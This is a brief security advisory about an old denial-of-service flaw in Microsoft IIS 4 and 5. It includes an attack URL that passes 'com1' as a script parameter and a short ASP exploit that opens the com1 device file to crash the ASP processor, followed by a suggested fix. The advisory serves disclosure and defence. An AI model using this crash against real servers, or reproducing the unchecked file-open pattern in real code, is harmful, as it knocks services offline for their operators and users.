Vulnerability
IIS
Affected
MS IIS 4, 5
Description
VIPER_SV /nerf/team/ found following. Openning and reading of
device files (com1, com2, etc.) using Scripting.FileSystemObject
will crash ASP-processor (asp.dll).
So, if you have permission on creating .asp-file, you can crash
ASP-processor. Sometimes filename passing as asp-script param,
which open and read data from file. Passing param as device file
will crash asp-processor.
http://host.int/scripts/script.asp?script=com1
ASP-Exploit:
<%
Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
Solution
Fix Scripting.FileSystemObject (have to check file for existing
before openning.
Credits
-- UnKnown --
|